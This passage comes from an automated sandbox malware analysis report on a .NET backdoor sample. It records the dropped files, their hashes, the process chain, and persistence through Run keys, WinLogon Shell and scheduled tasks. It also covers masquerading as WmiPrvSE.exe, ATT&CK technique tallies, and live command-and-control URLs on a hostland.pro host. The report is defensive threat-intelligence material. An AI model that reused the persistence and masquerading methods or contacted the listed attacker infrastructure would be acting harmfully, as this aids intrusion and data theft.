                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007EF063 SetUnhandledExceptionFilter, 0_2_007EF063
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007EF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_007EF22B
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_007F866F
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007EEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_007EEF05
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe"
                        Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Adobe\87tDm8T1lOvAjdSEmWMIMA3JTpcTMB.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Adobe\hui.exe C:\Users\user\AppData\Roaming\Adobe\hui.exe
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Adobe\hui.exe "C:\Users\user\AppData\Roaming\Adobe\hui.exe"
                        Source: hui.exe, 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, KQihinlofznONtA.exe, 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                        Source: hui.exe, 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, KQihinlofznONtA.exe, 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_007EA63C
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\hui.exe VolumeInformation
                        Source: C:\PerfLogs\KQihinlofznONtA.exe Queries volume information: C:\PerfLogs\KQihinlofznONtA.exe VolumeInformation
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe Queries volume information: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe VolumeInformation
                        Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\hui.exe VolumeInformation
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe Queries volume information: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe VolumeInformation
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007EED5B cpuid 0_2_007EED5B
                        Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007ED5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_007ED5D4
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007DACF5 GetVersionExW, 0_2_007DACF5

                        Stealing of Sensitive Information

                        Source: Yara match, File source: 00000008.00000002.1816721235.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000009.00000002.1760913066.000000000299D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000004.00000002.1741908323.000000000258D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: hui.exe PID: 7000, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: KQihinlofznONtA.exe PID: 5084, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: WmiPrvSE.exe PID: 4136, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: hui.exe PID: 5664, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: WmiPrvSE.exe PID: 6476, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match, File source: 00000008.00000002.1816721235.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000009.00000002.1760913066.000000000299D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000004.00000002.1741908323.000000000258D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: hui.exe PID: 7000, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: KQihinlofznONtA.exe PID: 5084, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: WmiPrvSE.exe PID: 4136, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: hui.exe PID: 5664, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: WmiPrvSE.exe PID: 6476, type: MEMORYSTR
                        Tactics and techniques (the report's per-technique counts are given in parentheses where present):

                        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                        Execution: Windows Management Instrumentation (11); Command and Scripting Interpreter (2); Scheduled Task/Job (1); Scripting (11); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
                        Persistence: Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                        Privilege Escalation: Process Injection (12); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                        Defense Evasion: Masquerading (13); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (21); Process Injection (12); Deobfuscate/Decode Files or Information (11); Scripting (11); Obfuscated Files or Information (3); Software Packing (21); DLL Side-Loading (1)
                        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                        Discovery: System Time Discovery (1); Security Software Discovery (121); Process Discovery (2); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (37); Network Service Scanning; System Network Connections Discovery
                        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
                        Collection: Archive Collected Data (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                        Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (113); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                        Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                        Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                        Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
                        Behavior Graph ID: 1337252. Sample: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe. Start date: 05/11/2023. Architecture: WINDOWS. Score: 100.

                        Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 11 other signatures. DNS/IP: host1835875.hostland.pro.

                        Process tree recovered from the behavior graph:

                        • HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe (started)
                          - dropped: C:\Users\user\AppData\Roaming\Adobe\hui.exe (PE32); C:\Users\user\AppData\...\sN8j8UtUmLUEbzv.vbe (data)
                          - signature: Drops executable to a common third party application directory
                          - wscript.exe (started)
                            - signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                            - cmd.exe (started)
                              - conhost.exe (started)
                              - hui.exe (started)
                                - dropped: C:\Program Files\...\WmiPrvSE.exe (PE32); C:\PerfLogs\WmiPrvSE.exe (PE32); C:\PerfLogs\KQihinlofznONtA.exe (PE32); C:\Users\user\AppData\...\zoUR8TSZV2.bat (DOS)
                                - signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; 3 other signatures
                                - cmd.exe (started)
                                  - conhost.exe (started); chcp.com (started); w32tm.exe (started); hui.exe (started)
                        • KQihinlofznONtA.exe (started)
                          - signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                        • WmiPrvSE.exe (started)
                          - network: host1835875.hostland.pro 185.26.122.79, 49729, 49736, 80, HOSTLANDRU, Russian Federation
                        • 4 other processes (started)

                        Source | Detection | Scanner | Label
                        HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.SpyNoon
                        HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | 66% | Virustotal |
                        HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | 100% | Avira | VBS/Runner.VPG
                        HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | 100% | Joe Sandbox ML |
                        Source | Detection | Scanner | Label
                        C:\Users\user\AppData\Roaming\Adobe\hui.exe | 100% | Avira | HEUR/AGEN.1323343
                        C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe | 100% | Avira | VBS/Runner.VPG
                        C:\PerfLogs\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323343
                        C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat | 100% | Avira | BAT/Runner.rghmi
                        C:\PerfLogs\KQihinlofznONtA.exe | 100% | Avira | HEUR/AGEN.1323343
                        C:\PerfLogs\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323343
                        C:\Users\user\AppData\Roaming\Adobe\hui.exe | 100% | Joe Sandbox ML |
                        C:\PerfLogs\WmiPrvSE.exe | 100% | Joe Sandbox ML |
                        C:\PerfLogs\KQihinlofznONtA.exe | 100% | Joe Sandbox ML |
                        C:\PerfLogs\WmiPrvSE.exe | 100% | Joe Sandbox ML |
                        C:\PerfLogs\KQihinlofznONtA.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.LightStone
                        C:\PerfLogs\KQihinlofznONtA.exe | 61% | Virustotal |
                        C:\PerfLogs\WmiPrvSE.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.LightStone
                        C:\PerfLogs\WmiPrvSE.exe | 61% | Virustotal |
                        C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.LightStone
                        C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | 61% | Virustotal |
                        C:\Users\user\AppData\Roaming\Adobe\hui.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.LightStone
                        C:\Users\user\AppData\Roaming\Adobe\hui.exe | 61% | Virustotal |
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        host1835875.hostland.pro | 185.26.122.79 | true | false | | high
                        Name | Malicious | Antivirus Detection | Reputation
                        http://host1835875.hostland.pro/Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z | false | | high
                        http://host1835875.hostland.pro/@0NXZ0xGbvB3Zu9Gb39GT | false | | high
                        http://host1835875.hostland.pro/Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://steamcommunity.com/profiles/ | WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://host1835875.hostland.pro/Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf | WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://host1835875.hostland.pro/ | WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://host1835875.hostland.pro/Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b | WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002AC8000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | hui.exe, 00000004.00000002.1741908323.0000000002619000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://host1835875.hostland.pro | WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://research.activision.com/opensourceD | HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, hui.exe.0.dr, WmiPrvSE.exe.4.dr, KQihinlofznONtA.exe.4.dr, WmiPrvSE.exe0.4.dr | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.26.122.79 | host1835875.hostland.pro | Russian Federation | 62082 | HOSTLANDRU | false
Joe Sandbox Version: 38.0.0 Ammolite
Analysis ID: 1337252
Start date and time: 2023-11-05 14:26:05 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@24/15@1/1
EGA Information:
• Successful, ratio: 16.7%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 440
• Number of non-executed functions: 96
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target KQihinlofznONtA.exe, PID 5084 because it is empty
• Execution Graph export aborted for target WmiPrvSE.exe, PID 4136 because it is empty
• Execution Graph export aborted for target WmiPrvSE.exe, PID 6476 because it is empty
• Execution Graph export aborted for target hui.exe, PID 5664 because it is empty
• Execution Graph export aborted for target hui.exe, PID 7000 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
13:27:03 | Task Scheduler | Run new task: KQihinlofznONtA path: "C:\PerfLogs\KQihinlofznONtA.exe"
13:27:03 | Task Scheduler | Run new task: WmiPrvSE path: "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
13:27:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtA "C:\PerfLogs\KQihinlofznONtA.exe"
13:27:12 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
13:27:21 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtA "C:\PerfLogs\KQihinlofznONtA.exe"
13:27:29 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
13:27:37 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtA "C:\PerfLogs\KQihinlofznONtA.exe"
13:27:45 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
13:28:02 | Autostart | Run: WinLogon Shell "C:\PerfLogs\KQihinlofznONtA.exe"
13:28:10 | Autostart | Run: WinLogon Shell "C:\PerfLogs\WmiPrvSE.exe"
13:28:18 | Autostart | Run: WinLogon Shell "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
14:27:05 | API Interceptor | 8x Sleep call for process: WmiPrvSE.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.26.122.79 | 8uV9c7vuZC.exe | Get hash | malicious | Raccoon Stealer v2, RedLine, SmokeLoader | Browse
• host1848185.hostland.pro/ed.exe
                                              No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
HOSTLANDRU | yk2Eh24FDd.exe | Get hash | malicious | Unknown | Browse
• 185.26.122.81
HOSTLANDRU | hT0xyYJthf.exe | Get hash | malicious | Unknown | Browse
• 185.26.122.81
HOSTLANDRU | https://hideuri.com/EXWJgm | Get hash | malicious | Unknown | Browse
• 185.26.122.79
HOSTLANDRU | rwDENO48jg.elf | Get hash | malicious | Mirai, Moobot | Browse
• 185.221.215.184
HOSTLANDRU | i21878JK11.exe | Get hash | malicious | DCRat | Browse
• 185.26.122.80
HOSTLANDRU | i21878JK11.exe | Get hash | malicious | DCRat | Browse
• 185.26.122.80
HOSTLANDRU | Transaccions DOC-REF DX739475.exe | Get hash | malicious | FormBook, GuLoader | Browse
• 185.26.122.9
HOSTLANDRU | 2D9643297F94E7AF81915ADAA5F1BA01D2809449B1DE2.exe | Get hash | malicious | Azorult | Browse
• 185.26.122.8
HOSTLANDRU | 8uV9c7vuZC.exe | Get hash | malicious | Raccoon Stealer v2, RedLine, SmokeLoader | Browse
• 185.26.122.79
HOSTLANDRU | New Order Requirement.exe | Get hash | malicious | FormBook, GuLoader | Browse
• 185.26.122.20
HOSTLANDRU | SzW3mTP02w | Get hash | malicious | Unknown | Browse
• 185.26.120.181
HOSTLANDRU | 7XshR39SUp | Get hash | malicious | Unknown | Browse
• 185.26.120.181
HOSTLANDRU | u6cMNSKOuK | Get hash | malicious | Unknown | Browse
• 185.26.120.181
HOSTLANDRU | QkP4aKN7Xm | Get hash | malicious | Unknown | Browse
• 185.26.120.181
HOSTLANDRU | h8Z5dNxYst | Get hash | malicious | Unknown | Browse
• 185.26.120.181
HOSTLANDRU | Hl0Kvg9khc | Get hash | malicious | Unknown | Browse
• 185.26.120.181
HOSTLANDRU | cFg27QO2Jf | Get hash | malicious | Unknown | Browse
• 185.26.120.181
HOSTLANDRU | 2NL8q5uKnf | Get hash | malicious | Mirai | Browse
• 185.26.120.181
HOSTLANDRU | sIBZbSbh7f.exe | Get hash | malicious | DCRat | Browse
• 185.26.122.20
HOSTLANDRU | HBW PAYMENT LIST FOR 2021,20210809.xlsx | Get hash | malicious | FormBook | Browse
• 185.26.122.58
                                              No context
                                              No context
Process: C:\Users\user\AppData\Roaming\Adobe\hui.exe
File Type: ASCII text, with very long lines (448), with no line terminators
Category: dropped
Size (bytes): 448
Entropy (8bit): 5.832471188424169
Encrypted: false
SSDEEP: 12:E9gU+g/NWq6FcbaMrFkTpIUuVM5dOlGfHKVL7VnOFigm:ECU+ruC9CasLMm
MD5: C5602D2775DA47AF4CDD8990DBE8DB5F
SHA1: 85F3436A7F79804153DE06FCA735FCEA0E86CDF7
SHA-256: 755BA2478C9CA716AB00891AAB8CFAFDD7438D1100C39C63B2C8C9DB478354D7
SHA-512: F3A1D21A8DE880F22D579B833BEC4C60082D763F608E535F99F7390B5A9D348480461B52E7BD203E83F5E9039317048B2D349E613FEF25CC46E3D9171488FF3E
Malicious: false
Reputation: low
                                              Preview:zuCT7la06RNRJkV45eQyMOt97j5QvB2R9lMERM3RXjCJqquBhDQoDWPkADWYpJE5Z6RhXQmtk8bmLkTQy3ssvNNnWlEOzemNfHtuZMoQahDE5mZZuFkvaWJMsoLvMY3GWNGD1i1mPbROJJrtMoeu40xJ8hCvB3ECn7rsfViLN8f9E5Ci6bih4JLfa7FTgGkWXPkMb9N0GSg6UxEDfdyjUgIewMShQOoHXJlzU0H7OsblmOLm3CyDRBB1GGZPrpj2oZjKMOsoV1VlEh1iApoOZlzVHtsNa2PiIj6NoAZpTJraqawjO1OBBVcDjNCcffOdlwdfko3AQ95Q3Zpr7J9jnOhxG3oa76Jy5Ny37R9k7NuCaMJKiVfWfo0XPpYqAdDTzHUqkvuqJZmZefX4ue2mawSQXbnR2TkeKaMS1cjwkzNGCa2uSe5fla3DyESJIdxz
Process: C:\Users\user\AppData\Roaming\Adobe\hui.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 944128
Entropy (8bit): 6.079052617493347
Encrypted: false
SSDEEP: 12288:6r2SWfasLDVGtSOG77ZJ99QxsLKdyfbBsBdB8KYVQ66BrPO9lLeJgNdrgqn4:6avL5BH7pdKk+BSjLeuNVg+4
MD5: 1B46DAD7064609344351AC9EFE3F9AAB
SHA1: 9AA8051F5EF6F800410EC669E52B415B6BF43816
SHA-256: 3BD60F927E3882940077FA527712E5C55A2767564B39A932C4D4941E190A4C81
SHA-512: CE773799E73F0B61A793098DF7A824346EC1D94D16877A272ACE42A644D4FDF7D6A68B4A7C976B4B90471036F0D68B56BBFEC18CFFC68331C32970E7DB7C57C4
Malicious: true
Yara Hits:
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\PerfLogs\KQihinlofznONtA.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 88%
• Antivirus: Virustotal, Detection: 61%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+Va.....................Z......^)... ...@....@.. ....................................@..................................)..K.......X............................................................................ ............... ..H............text...d.... ...................... ..`.sdata...R...@...T..................@....rsrc...X............b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Roaming\Adobe\hui.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 944128
Entropy (8bit): 6.079052617493347
Encrypted: false
SSDEEP: 12288:6r2SWfasLDVGtSOG77ZJ99QxsLKdyfbBsBdB8KYVQ66BrPO9lLeJgNdrgqn4:6avL5BH7pdKk+BSjLeuNVg+4
MD5: 1B46DAD7064609344351AC9EFE3F9AAB
SHA1: 9AA8051F5EF6F800410EC669E52B415B6BF43816
SHA-256: 3BD60F927E3882940077FA527712E5C55A2767564B39A932C4D4941E190A4C81
SHA-512: CE773799E73F0B61A793098DF7A824346EC1D94D16877A272ACE42A644D4FDF7D6A68B4A7C976B4B90471036F0D68B56BBFEC18CFFC68331C32970E7DB7C57C4
Malicious: true
                                              Yara Hits:
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\PerfLogs\WmiPrvSE.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 88%
                                              • Antivirus: Virustotal, Detection: 61%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+Va.....................Z......^)... ...@....@.. ....................................@..................................)..K.......X............................................................................ ............... ..H............text...d.... ...................... ..`.sdata...R...@...T..................@....rsrc...X............b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Roaming\Adobe\hui.exe
File Type: ASCII text, with very long lines (392), with no line terminators
Category: dropped
Size (bytes): 392
Entropy (8bit): 5.847265379838702
Encrypted: false
SSDEEP: 12:Cxb3qtV4MCUCkmtxRiogB++EdKEQBEQcPYO6r0:NbQrtx5f4Eu0g0
MD5: AA3AE47C11C8C56F211E5309282E3BB8
SHA1: DA8D52320EA4900D6423893A21DBA1C8E0655E15
SHA-256: 4C71ADDB7F681ABE785EBD5E6FD14D55911E224F0226C0EB512A5EC6AB156A2D
SHA-512: 9B3FB8CE06903BC25179309093E7440BACEE149DFB21B76785326C6DB440D98553D291A5836810AE15A4ABD072F2D582FE514B0F6ABA3D49559420890E6E8932
Malicious: false
